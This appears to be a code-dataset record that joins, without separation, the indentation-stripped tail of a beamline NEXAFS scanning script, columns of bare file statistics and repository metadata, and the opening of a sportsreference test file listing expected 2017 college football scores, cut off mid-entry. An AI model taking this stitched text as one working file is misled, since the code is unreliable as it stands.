y_list = [ -900, -700, -800, -700, -700, -500, -1100, -1100]
z_list = [ 4600, 4600, 4500, 4300, 4200, 4100, 4000, 4000]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
assert len(x_list) == len(z_list), f'Number of X coordinates ({len(x_list)}) is different from number of z coord ({len(z_list)})'
for x, y, z, name in zip(x_list, y_list, z_list, samples):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
yield from NEXAFS_Ca_edge_multi(t=t, name=name)
# sample_id(user_name='test', sample_name='test')
# yield from bps.mv(att2_11, 'Insert')
# yield from bps.mv(GV7.open_cmd, 1 )
# yield from bps.sleep(2)
# yield from bps.mv(att2_11, 'Insert')
# yield from bps.mv(GV7.open_cmd, 1 )
def NEXAFS_Ca_edge_multi(t=0.5, name='test'):
yield from bps.mv(waxs, 52)
dets = [pil300KW]
energies = np.linspace(4030, 4150, 121)
det_exposure_time(t,t)
name_fmt = 'nexafs_{sample}_{energy}eV_xbpm{xbpm}'
for e in energies:
yield from bps.mv(energy, e)
yield from bps.sleep(3)
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
RE.md['filename_amptek'] = sample_name
sample_id(user_name='OS', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 4125)
yield from bps.mv(energy, 4100)
yield from bps.mv(energy, 4075)
yield from bps.mv(energy, 4050)
yield from bps.mv(energy, 4030)
sample_id(user_name='test', sample_name='test')
| 53.90785
| 173
| 0.548465
| 4,903
| 31,590
| 3.39486
| 0.10157
| 0.073536
| 0.085792
| 0.093361
| 0.888735
| 0.87696
| 0.869631
| 0.865665
| 0.855933
| 0.851066
| 0
| 0.274304
| 0.264419
| 31,590
| 585
| 174
| 54
| 0.442011
| 0.517221
| 0
| 0.663636
| 0
| 0.045455
| 0.173128
| 0.017319
| 0
| 0
| 0
| 0
| 0.077273
| 1
| 0.036364
| false
| 0
| 0
| 0
| 0.036364
| 0.013636
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0a0b2011d0bf72da6fe5f776597c2651014895bc
| 168,583
|
py
|
Python
|
tests/integration/boxscore/test_ncaaf_boxscore.py
|
ajhodges/sportsreference
|
8cb38db3ff2c38806cb4a68482208fd5e0f3084a
|
[
"MIT"
] | null | null | null |
tests/integration/boxscore/test_ncaaf_boxscore.py
|
ajhodges/sportsreference
|
8cb38db3ff2c38806cb4a68482208fd5e0f3084a
|
[
"MIT"
] | null | null | null |
tests/integration/boxscore/test_ncaaf_boxscore.py
|
ajhodges/sportsreference
|
8cb38db3ff2c38806cb4a68482208fd5e0f3084a
|
[
"MIT"
] | null | null | null |
import mock
import os
import pandas as pd
from datetime import datetime
from flexmock import flexmock
from sportsreference import utils
from sportsreference.constants import AWAY
from sportsreference.ncaaf.constants import BOXSCORE_URL, BOXSCORES_URL
from sportsreference.ncaaf.boxscore import Boxscore, Boxscores
MONTH = 10
YEAR = 2017
BOXSCORE = '2018-01-08-georgia'
def read_file(filename):
filepath = os.path.join(os.path.dirname(__file__), 'ncaaf', filename)
return open('%s' % filepath, 'r', encoding='utf8').read()
def mock_pyquery(url):
class MockPQ:
def __init__(self, html_contents):
self.status_code = 200
self.html_contents = html_contents
self.text = html_contents
if url == BOXSCORES_URL % (8, 30, 2017):
return MockPQ(read_file('boxscores-8-30-2017.html'))
if url == BOXSCORES_URL % (8, 31, 2017):
return MockPQ(read_file('boxscores-8-31-2017.html'))
boxscore = read_file('%s.html' % BOXSCORE)
return MockPQ(boxscore)
class MockDateTime:
def __init__(self, year, month):
self.year = year
self.month = month
class TestNCAAFBoxscore:
@mock.patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
self.results = {
'date': 'Monday Jan 8, 2018',
'time': '8:00 PM ET',
'stadium': 'Mercedes-Benz Stadium - Atlanta, Georgia',
'winner': AWAY,
'winning_name': 'Alabama',
'winning_abbr': 'ALABAMA',
'losing_name': 'Georgia',
'losing_abbr': 'GEORGIA',
'away_points': 26,
'away_first_downs': 20,
'away_rush_attempts': 39,
'away_rush_yards': 184,
'away_rush_touchdowns': 0,
'away_pass_completions': 17,
'away_pass_attempts': 32,
'away_pass_yards': 187,
'away_pass_touchdowns': 3,
'away_interceptions': 1,
'away_total_yards': 371,
'away_fumbles': 0,
'away_fumbles_lost': 0,
'away_turnovers': 1,
'away_penalties': 6,
'away_yards_from_penalties': 41,
'home_points': 23,
'home_first_downs': 22,
'home_rush_attempts': 45,
'home_rush_yards': 133,
'home_rush_touchdowns': 1,
'home_pass_completions': 16,
'home_pass_attempts': 32,
'home_pass_yards': 232,
'home_pass_touchdowns': 1,
'home_interceptions': 2,
'home_total_yards': 365,
'home_fumbles': 0,
'home_fumbles_lost': 0,
'home_turnovers': 2,
'home_penalties': 6,
'home_yards_from_penalties': 65
}
flexmock(utils) \
.should_receive('_todays_date') \
.and_return(MockDateTime(YEAR, MONTH))
self.boxscore = Boxscore(BOXSCORE)
def test_ncaaf_boxscore_returns_requested_boxscore(self):
for attribute, value in self.results.items():
assert getattr(self.boxscore, attribute) == value
def test_invalid_url_yields_empty_class(self):
flexmock(Boxscore) \
.should_receive('_retrieve_html_page') \
.and_return(None)
boxscore = Boxscore(BOXSCORE)
for key, value in boxscore.__dict__.items():
if key == '_uri':
continue
assert value is None
def test_ncaaf_boxscore_dataframe_returns_dataframe_of_all_values(self):
df = pd.DataFrame([self.results], index=[BOXSCORE])
# Pandas doesn't natively allow comparisons of DataFrames.
# Concatenating the two DataFrames (the one generated during the test
# and the expected one above) and dropping duplicate rows leaves only
# the rows that are unique between the two frames. This allows a quick
# check of the DataFrame to see if it is empty - if so, all rows are
# duplicates, and they are equal.
frames = [df, self.boxscore.dataframe]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_ncaaf_boxscore_players(self):
boxscore = Boxscore(BOXSCORE)
assert len(boxscore.home_players) == 30
assert len(boxscore.away_players) == 34
for player in boxscore.home_players:
assert not player.dataframe.empty
for player in boxscore.away_players:
assert not player.dataframe.empty
class TestNCAAFBoxscores:
def setup_method(self):
self.expected = {
'8-30-2017': [
{'boxscore': '2017-09-04-georgia-tech',
'away_name': 'Tennessee',
'away_abbr': 'tennessee',
'away_score': 42,
'away_rank': 25,
'home_name': 'Georgia Tech',
'home_abbr': 'georgia-tech',
'home_score': 41,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Tennessee',
'winning_abbr': 'tennessee',
'losing_name': 'Georgia Tech',
'losing_abbr': 'georgia-tech'},
{'boxscore': '2017-09-03-ucla',
'away_name': 'Texas A&M',
'away_abbr': 'texas-am',
'away_score': 44,
'away_rank': None,
'home_name': 'UCLA',
'home_abbr': 'ucla',
'home_score': 45,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCLA',
'winning_abbr': 'ucla',
'losing_name': 'Texas A&M',
'losing_abbr': 'texas-am'},
{'boxscore': '2017-09-03-virginia-tech',
'away_name': 'West Virginia',
'away_abbr': 'west-virginia',
'away_score': 24,
'away_rank': 22,
'home_name': 'Virginia Tech',
'home_abbr': 'virginia-tech',
'home_score': 31,
'home_rank': 21,
'non_di': False,
'top_25': True,
'winning_name': 'Virginia Tech',
'winning_abbr': 'virginia-tech',
'losing_name': 'West Virginia',
'losing_abbr': 'west-virginia'},
{'boxscore': '2017-09-02-air-force',
'away_name': 'Virginia Military Institute',
'away_abbr': 'Virginia Military Institute',
'away_score': 0,
'away_rank': None,
'home_name': 'Air Force',
'home_abbr': 'air-force',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-alabama-birmingham',
'away_name': 'Alabama A&M',
'away_abbr': 'Alabama A&M',
'away_score': 7,
'away_rank': None,
'home_name': 'UAB',
'home_abbr': 'alabama-birmingham',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'UAB',
'winning_abbr': 'alabama-birmingham',
'losing_name': 'Alabama A&M',
'losing_abbr': 'Alabama A&M'},
{'boxscore': '2017-09-02-arizona',
'away_name': 'Northern Arizona',
'away_abbr': 'Northern Arizona',
'away_score': 24,
'away_rank': None,
'home_name': 'Arizona',
'home_abbr': 'arizona',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Arizona',
'winning_abbr': 'arizona',
'losing_name': 'Northern Arizona',
'losing_abbr': 'Northern Arizona'},
{'boxscore': '2017-09-02-auburn',
'away_name': 'Georgia Southern',
'away_abbr': 'georgia-southern',
'away_score': 7,
'away_rank': None,
'home_name': 'Auburn',
'home_abbr': 'auburn',
'home_score': 41,
'home_rank': 12,
'non_di': False,
'top_25': True,
'winning_name': 'Auburn',
'winning_abbr': 'auburn',
'losing_name': 'Georgia Southern',
'losing_abbr': 'georgia-southern'},
{'boxscore': '2017-09-02-baylor',
'away_name': 'Liberty',
'away_abbr': 'Liberty',
'away_score': 48,
'away_rank': None,
'home_name': 'Baylor',
'home_abbr': 'baylor',
'home_score': 45,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Liberty',
'winning_abbr': 'Liberty',
'losing_name': 'Baylor',
'losing_abbr': 'baylor'},
{'boxscore': '2017-09-02-boise-state',
'away_name': 'Troy',
'away_abbr': 'troy',
'away_score': 13,
'away_rank': None,
'home_name': 'Boise State',
'home_abbr': 'boise-state',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boise State',
'winning_abbr': 'boise-state',
'losing_name': 'Troy',
'losing_abbr': 'troy'},
{'boxscore': '2017-09-02-brigham-young',
'away_name': 'LSU',
'away_abbr': 'louisiana-state',
'away_score': 27,
'away_rank': 13,
'home_name': 'Brigham Young',
'home_abbr': 'brigham-young',
'home_score': 0,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-central-florida',
'away_name': 'Florida International',
'away_abbr': 'florida-international',
'away_score': 17,
'away_rank': None,
'home_name': 'UCF',
'home_abbr': 'central-florida',
'home_score': 61,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCF',
'winning_abbr': 'central-florida',
'losing_name': 'Florida International',
'losing_abbr': 'florida-international'},
{'boxscore': '2017-09-02-clemson',
'away_name': 'Kent State',
'away_abbr': 'kent-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Clemson',
'home_abbr': 'clemson',
'home_score': 56,
'home_rank': 5,
'non_di': False,
'top_25': True,
'winning_name': 'Clemson',
'winning_abbr': 'clemson',
'losing_name': 'Kent State',
'losing_abbr': 'kent-state'},
{'boxscore': '2017-09-02-coastal-carolina',
'away_name': 'Massachusetts',
'away_abbr': 'massachusetts',
'away_score': 28,
'away_rank': None,
'home_name': 'Coastal Carolina',
'home_abbr': 'coastal-carolina',
'home_score': 38,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Coastal Carolina',
'winning_abbr': 'coastal-carolina',
'losing_name': 'Massachusetts',
'losing_abbr': 'massachusetts'},
{'boxscore': '2017-09-02-duke',
'away_name': 'North Carolina Central',
'away_abbr': 'North Carolina Central',
'away_score': 7,
'away_rank': None,
'home_name': 'Duke',
'home_abbr': 'duke',
'home_score': 60,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Duke',
'winning_abbr': 'duke',
'losing_name': 'North Carolina Central',
'losing_abbr': 'North Carolina Central'},
{'boxscore': '2017-09-02-east-carolina',
'away_name': 'James Madison',
'away_abbr': 'James Madison',
'away_score': 34,
'away_rank': None,
'home_name': 'East Carolina',
'home_abbr': 'east-carolina',
'home_score': 14,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'James Madison',
'winning_abbr': 'James Madison',
'losing_name': 'East Carolina',
'losing_abbr': 'east-carolina'},
{'boxscore': '2017-09-02-florida-state',
'away_name': 'Alabama',
'away_abbr': 'alabama',
'away_score': 24,
'away_rank': 1,
'home_name': 'Florida State',
'home_abbr': 'florida-state',
'home_score': 7,
'home_rank': 3,
'non_di': False,
'top_25': True,
'winning_name': 'Alabama',
'winning_abbr': 'alabama',
'losing_name': 'Florida State',
'losing_abbr': 'florida-state'},
{'boxscore': '2017-09-02-fresno-state',
'away_name': 'Incarnate Word',
'away_abbr': 'Incarnate Word',
'away_score': 0,
'away_rank': None,
'home_name': 'Fresno State',
'home_abbr': 'fresno-state',
'home_score': 66,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-georgia',
'away_name': 'Appalachian State',
'away_abbr': 'appalachian-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Georgia',
'home_abbr': 'georgia',
'home_score': 31,
'home_rank': 15,
'non_di': False,
'top_25': True,
'winning_name': 'Georgia',
'winning_abbr': 'georgia',
'losing_name': 'Appalachian State',
'losing_abbr': 'appalachian-state'},
{'boxscore': '2017-09-02-hawaii',
'away_name': 'Western Carolina',
'away_abbr': 'Western Carolina',
'away_score': 18,
'away_rank': None,
'home_name': 'Hawaii',
'home_abbr': 'hawaii',
'home_score': 41,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Hawaii',
'winning_abbr': 'hawaii',
'losing_name': 'Western Carolina',
'losing_abbr': 'Western Carolina'},
{'boxscore': '2017-09-02-illinois',
'away_name': 'Ball State',
'away_abbr': 'ball-state',
'away_score': 21,
'away_rank': None,
'home_name': 'Illinois',
'home_abbr': 'illinois',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Illinois',
'winning_abbr': 'illinois',
'losing_name': 'Ball State',
'losing_abbr': 'ball-state'},
{'boxscore': '2017-09-02-iowa',
'away_name': 'Wyoming',
'away_abbr': 'wyoming',
'away_score': 3,
'away_rank': None,
'home_name': 'Iowa',
'home_abbr': 'iowa',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Iowa',
'winning_abbr': 'iowa',
'losing_name': 'Wyoming',
'losing_abbr': 'wyoming'},
{'boxscore': '2017-09-02-iowa-state',
'away_name': 'Northern Iowa',
'away_abbr': 'Northern Iowa',
'away_score': 24,
'away_rank': None,
'home_name': 'Iowa State',
'home_abbr': 'iowa-state',
'home_score': 42,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Iowa State',
'winning_abbr': 'iowa-state',
'losing_name': 'Northern Iowa',
'losing_abbr': 'Northern Iowa'},
{'boxscore': '2017-09-02-kansas',
'away_name': 'Southeast Missouri State',
'away_abbr': 'Southeast Missouri State',
'away_score': 16,
'away_rank': None,
'home_name': 'Kansas',
'home_abbr': 'kansas',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Kansas',
'winning_abbr': 'kansas',
'losing_name': 'Southeast Missouri State',
'losing_abbr': 'Southeast Missouri State'},
{'boxscore': '2017-09-02-kansas-state',
'away_name': 'Central Arkansas',
'away_abbr': 'Central Arkansas',
'away_score': 19,
'away_rank': None,
'home_name': 'Kansas State',
'home_abbr': 'kansas-state',
'home_score': 55,
'home_rank': 20,
'non_di': True,
'top_25': True,
'winning_name': 'Kansas State',
'winning_abbr': 'kansas-state',
'losing_name': 'Central Arkansas',
'losing_abbr': 'Central Arkansas'},
{'boxscore': '2017-09-02-louisiana-lafayette',
'away_name': 'Southeastern Louisiana',
'away_abbr': 'Southeastern Louisiana',
'away_score': 48,
'away_rank': None,
'home_name': 'Louisiana',
'home_abbr': 'louisiana-lafayette',
'home_score': 51,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana',
'winning_abbr': 'louisiana-lafayette',
'losing_name': 'Southeastern Louisiana',
'losing_abbr': 'Southeastern Louisiana'},
{'boxscore': '2017-09-02-louisiana-tech',
'away_name': 'Northwestern State',
'away_abbr': 'Northwestern State',
'away_score': 24,
'away_rank': None,
'home_name': 'Louisiana Tech',
'home_abbr': 'louisiana-tech',
'home_score': 52,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana Tech',
'winning_abbr': 'louisiana-tech',
'losing_name': 'Northwestern State',
'losing_abbr': 'Northwestern State'},
{'boxscore': '2017-09-02-marshall',
'away_name': 'Miami (OH)',
'away_abbr': 'miami-oh',
'away_score': 26,
'away_rank': None,
'home_name': 'Marshall',
'home_abbr': 'marshall',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Marshall',
'winning_abbr': 'marshall',
'losing_name': 'Miami (OH)',
'losing_abbr': 'miami-oh'},
{'boxscore': '2017-09-02-miami-fl',
'away_name': 'Bethune-Cookman',
'away_abbr': 'Bethune-Cookman',
'away_score': 13,
'away_rank': None,
'home_name': 'Miami (FL)',
'home_abbr': 'miami-fl',
'home_score': 41,
'home_rank': 18,
'non_di': True,
'top_25': True,
'winning_name': 'Miami (FL)',
'winning_abbr': 'miami-fl',
'losing_name': 'Bethune-Cookman',
'losing_abbr': 'Bethune-Cookman'},
{'boxscore': '2017-09-02-michigan',
'away_name': 'Florida',
'away_abbr': 'florida',
'away_score': 17,
'away_rank': 17,
'home_name': 'Michigan',
'home_abbr': 'michigan',
'home_score': 33,
'home_rank': 11,
'non_di': False,
'top_25': True,
'winning_name': 'Michigan',
'winning_abbr': 'michigan',
'losing_name': 'Florida',
'losing_abbr': 'florida'},
{'boxscore': '2017-09-02-michigan-state',
'away_name': 'Bowling Green State',
'away_abbr': 'bowling-green-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Michigan State',
'home_abbr': 'michigan-state',
'home_score': 35,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Michigan State',
'winning_abbr': 'michigan-state',
'losing_name': 'Bowling Green State',
'losing_abbr': 'bowling-green-state'},
{'boxscore': '2017-09-02-middle-tennessee-state',
'away_name': 'Vanderbilt',
'away_abbr': 'vanderbilt',
'away_score': 28,
'away_rank': None,
'home_name': 'Middle Tennessee State',
'home_abbr': 'middle-tennessee-state',
'home_score': 6,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Vanderbilt',
'winning_abbr': 'vanderbilt',
'losing_name': 'Middle Tennessee State',
'losing_abbr': 'middle-tennessee-state'},
{'boxscore': '2017-09-02-mississippi',
'away_name': 'South Alabama',
'away_abbr': 'south-alabama',
'away_score': 27,
'away_rank': None,
'home_name': 'Ole Miss',
'home_abbr': 'mississippi',
'home_score': 47,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Ole Miss',
'winning_abbr': 'mississippi',
'losing_name': 'South Alabama',
'losing_abbr': 'south-alabama'},
{'boxscore': '2017-09-02-mississippi-state',
'away_name': 'Charleston Southern',
'away_abbr': 'Charleston Southern',
'away_score': 0,
'away_rank': None,
'home_name': 'Mississippi State',
'home_abbr': 'mississippi-state',
'home_score': 49,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-missouri',
'away_name': 'Missouri State',
'away_abbr': 'Missouri State',
'away_score': 43,
'away_rank': None,
'home_name': 'Missouri',
'home_abbr': 'missouri',
'home_score': 72,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Missouri',
'winning_abbr': 'missouri',
'losing_name': 'Missouri State',
'losing_abbr': 'Missouri State'},
{'boxscore': '2017-09-02-nebraska',
'away_name': 'Arkansas State',
'away_abbr': 'arkansas-state',
'away_score': 36,
'away_rank': None,
'home_name': 'Nebraska',
'home_abbr': 'nebraska',
'home_score': 43,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Nebraska',
'winning_abbr': 'nebraska',
'losing_name': 'Arkansas State',
'losing_abbr': 'arkansas-state'},
{'boxscore': '2017-09-02-nevada-las-vegas',
'away_name': 'Howard',
'away_abbr': 'Howard',
'away_score': 43,
'away_rank': None,
'home_name': 'UNLV',
'home_abbr': 'nevada-las-vegas',
'home_score': 40,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Howard',
'winning_abbr': 'Howard',
'losing_name': 'UNLV',
'losing_abbr': 'nevada-las-vegas'},
{'boxscore': '2017-09-02-new-mexico',
'away_name': 'Abilene Christian',
'away_abbr': 'Abilene Christian',
'away_score': 14,
'away_rank': None,
'home_name': 'New Mexico',
'home_abbr': 'new-mexico',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'New Mexico',
'winning_abbr': 'new-mexico',
'losing_name': 'Abilene Christian',
'losing_abbr': 'Abilene Christian'},
{'boxscore': '2017-09-02-north-carolina',
'away_name': 'California',
'away_abbr': 'california',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina',
'home_abbr': 'north-carolina',
'home_score': 30,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'California',
'winning_abbr': 'california',
'losing_name': 'North Carolina',
'losing_abbr': 'north-carolina'},
{'boxscore': '2017-09-02-north-carolina-state',
'away_name': 'South Carolina',
'away_abbr': 'south-carolina',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina State',
'home_abbr': 'north-carolina-state',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'South Carolina',
'winning_abbr': 'south-carolina',
'losing_name': 'North Carolina State',
'losing_abbr': 'north-carolina-state'},
{'boxscore': '2017-09-02-north-texas',
'away_name': 'Lamar',
'away_abbr': 'Lamar',
'away_score': 14,
'away_rank': None,
'home_name': 'North Texas',
'home_abbr': 'north-texas',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'North Texas',
'winning_abbr': 'north-texas',
'losing_name': 'Lamar',
'losing_abbr': 'Lamar'},
{'boxscore': '2017-09-02-northwestern',
'away_name': 'Nevada',
'away_abbr': 'nevada',
'away_score': 20,
'away_rank': None,
'home_name': 'Northwestern',
'home_abbr': 'northwestern',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Northwestern',
'winning_abbr': 'northwestern',
'losing_name': 'Nevada',
'losing_abbr': 'nevada'},
{'boxscore': '2017-09-02-notre-dame',
'away_name': 'Temple',
'away_abbr': 'temple',
'away_score': 16,
'away_rank': None,
'home_name': 'Notre Dame',
'home_abbr': 'notre-dame',
'home_score': 49,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Notre Dame',
'winning_abbr': 'notre-dame',
'losing_name': 'Temple',
'losing_abbr': 'temple'},
{'boxscore': '2017-09-02-ohio',
'away_name': 'Hampton',
'away_abbr': 'Hampton',
'away_score': 0,
'away_rank': None,
'home_name': 'Ohio',
'home_abbr': 'ohio',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-oklahoma',
'away_name': 'UTEP',
'away_abbr': 'texas-el-paso',
'away_score': 7,
'away_rank': None,
'home_name': 'Oklahoma',
'home_abbr': 'oklahoma',
'home_score': 56,
'home_rank': 7,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma',
'winning_abbr': 'oklahoma',
'losing_name': 'UTEP',
'losing_abbr': 'texas-el-paso'},
{'boxscore': '2017-09-02-oklahoma-state',
'away_name': 'Tulsa',
'away_abbr': 'tulsa',
'away_score': 24,
'away_rank': None,
'home_name': 'Oklahoma State',
'home_abbr': 'oklahoma-state',
'home_score': 59,
'home_rank': 10,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma State',
'winning_abbr': 'oklahoma-state',
'losing_name': 'Tulsa',
'losing_abbr': 'tulsa'},
{'boxscore': '2017-09-02-old-dominion',
'away_name': 'Albany',
'away_abbr': 'Albany',
'away_score': 17,
'away_rank': None,
'home_name': 'Old Dominion',
'home_abbr': 'old-dominion',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Old Dominion',
'winning_abbr': 'old-dominion',
'losing_name': 'Albany',
'losing_abbr': 'Albany'},
{'boxscore': '2017-09-02-oregon',
'away_name': 'Southern Utah',
'away_abbr': 'Southern Utah',
'away_score': 21,
'away_rank': None,
'home_name': 'Oregon',
'home_abbr': 'oregon',
'home_score': 77,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon',
'winning_abbr': 'oregon',
'losing_name': 'Southern Utah',
'losing_abbr': 'Southern Utah'},
{'boxscore': '2017-09-02-oregon-state',
'away_name': 'Portland State',
'away_abbr': 'Portland State',
'away_score': 32,
'away_rank': None,
'home_name': 'Oregon State',
'home_abbr': 'oregon-state',
'home_score': 35,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon State',
'winning_abbr': 'oregon-state',
'losing_name': 'Portland State',
'losing_abbr': 'Portland State'},
{'boxscore': '2017-09-02-penn-state',
'away_name': 'Akron',
'away_abbr': 'akron',
'away_score': 0,
'away_rank': None,
'home_name': 'Penn State',
'home_abbr': 'penn-state',
'home_score': 52,
'home_rank': 6,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-pittsburgh',
'away_name': 'Youngstown State',
'away_abbr': 'Youngstown State',
'away_score': 21,
'away_rank': None,
'home_name': 'Pitt',
'home_abbr': 'pittsburgh',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Pitt',
'winning_abbr': 'pittsburgh',
'losing_name': 'Youngstown State',
'losing_abbr': 'Youngstown State'},
{'boxscore': '2017-09-02-purdue',
'away_name': 'Louisville',
'away_abbr': 'louisville',
'away_score': 35,
'away_rank': 16,
'home_name': 'Purdue',
'home_abbr': 'purdue',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Louisville',
'winning_abbr': 'louisville',
'losing_name': 'Purdue',
'losing_abbr': 'purdue'},
{'boxscore': '2017-09-02-san-diego-state',
'away_name': 'California-Davis',
'away_abbr': 'California-Davis',
'away_score': 17,
'away_rank': None,
'home_name': 'San Diego State',
'home_abbr': 'san-diego-state',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Diego State',
'winning_abbr': 'san-diego-state',
'losing_name': 'California-Davis',
'losing_abbr': 'California-Davis'},
{'boxscore': '2017-09-02-san-jose-state',
'away_name': 'Cal Poly',
'away_abbr': 'Cal Poly',
'away_score': 13,
'away_rank': None,
'home_name': 'San Jose State',
'home_abbr': 'san-jose-state',
'home_score': 34,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Jose State',
'winning_abbr': 'san-jose-state',
'losing_name': 'Cal Poly',
'losing_abbr': 'Cal Poly'},
{'boxscore': '2017-09-02-south-florida',
'away_name': 'Stony Brook',
'away_abbr': 'Stony Brook',
'away_score': 17,
'away_rank': None,
'home_name': 'South Florida',
'home_abbr': 'south-florida',
'home_score': 31,
'home_rank': 19,
'non_di': True,
'top_25': True,
'winning_name': 'South Florida',
'winning_abbr': 'south-florida',
'losing_name': 'Stony Brook',
'losing_abbr': 'Stony Brook'},
{'boxscore': '2017-09-02-southern-california',
'away_name': 'Western Michigan',
'away_abbr': 'western-michigan',
'away_score': 31,
'away_rank': None,
'home_name': 'USC',
'home_abbr': 'southern-california',
'home_score': 49,
'home_rank': 4,
'non_di': False,
'top_25': True,
'winning_name': 'USC',
'winning_abbr': 'southern-california',
'losing_name': 'Western Michigan',
'losing_abbr': 'western-michigan'},
{'boxscore': '2017-09-02-southern-methodist',
'away_name': 'Stephen F. Austin',
'away_abbr': 'Stephen F. Austin',
'away_score': 14,
'away_rank': None,
'home_name': 'SMU',
'home_abbr': 'southern-methodist',
'home_score': 58,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'SMU',
'winning_abbr': 'southern-methodist',
'losing_name': 'Stephen F. Austin',
'losing_abbr': 'Stephen F. Austin'},
{'boxscore': '2017-09-02-southern-mississippi',
'away_name': 'Kentucky',
'away_abbr': 'kentucky',
'away_score': 24,
'away_rank': None,
'home_name': 'Southern Mississippi',
'home_abbr': 'southern-mississippi',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Kentucky',
'winning_abbr': 'kentucky',
'losing_name': 'Southern Mississippi',
'losing_abbr': 'southern-mississippi'},
{'boxscore': '2017-09-02-texas',
'away_name': 'Maryland',
'away_abbr': 'maryland',
'away_score': 51,
'away_rank': None,
'home_name': 'Texas',
'home_abbr': 'texas',
'home_score': 41,
'home_rank': 23,
'non_di': False,
'top_25': True,
'winning_name': 'Maryland',
'winning_abbr': 'maryland',
'losing_name': 'Texas',
'losing_abbr': 'texas'},
{'boxscore': '2017-09-02-texas-christian',
'away_name': 'Jackson State',
'away_abbr': 'Jackson State',
'away_score': 0,
'away_rank': None,
'home_name': 'Texas Christian',
'home_abbr': 'texas-christian',
'home_score': 63,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-texas-state',
'away_name': '',
'away_abbr': '',
